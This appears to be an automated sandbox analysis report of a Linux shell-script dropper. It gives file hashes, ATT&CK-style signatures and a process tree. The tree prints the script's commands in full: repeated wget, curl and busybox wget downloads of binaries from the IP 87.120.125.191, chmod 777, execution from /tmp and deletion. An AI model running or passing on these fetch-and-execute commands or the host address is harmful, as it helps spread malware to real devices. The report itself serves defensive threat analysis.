Analysis
-
max time kernel
9s -
max time network
41s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/11/2024, 04:06
Static task
static1
Behavioral task
behavioral1
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
-
Size
10KB
-
MD5
2c8ee73ff481383ca124810fef8653b1
-
SHA1
2f0045a1346635e0b97b189a217d60329572ee9c
-
SHA256
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94
-
SHA512
a4cf9a0c5f3fcb4bbc802490023c07e2cdfe73a8a6d3d4903e7e952967325270f6f4a0bf912b58844b8655e30ba7832a39dc377a73ed4443b77740b6584ad8ad
-
SSDEEP
192:mrPM5ZTjn81dBLvdLvgaD6DGDN2uVFxFxFcj/flNzu7ui07gQ27wgRNKW5z7MUzm:jiC2N2uKu4OxTHC2N2uwCo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 6 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 673 chmod 684 chmod 692 chmod 707 chmod 723 chmod 739 chmod -
Executes dropped EXE 6 IoCs
ioc pid Process /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY 675 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD 685 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa 693 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx 709 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL 724 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I 741 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I -
Checks CPU configuration 1 TTPs 6 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY curl File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD curl File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa curl File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx curl File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL curl File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I curl
Processes
-
/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh1⤵PID:645
-
/bin/rm/bin/rm bins.sh2⤵PID:647
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:649
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:660
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:670
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:673
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:675
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:676
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:678
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:683
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:686
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:687
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:689
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:693
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:694
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:695
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:700
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:704
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:707
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:709
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:710
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:715
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:719
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:724
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:726
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:727
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:736
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:743
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97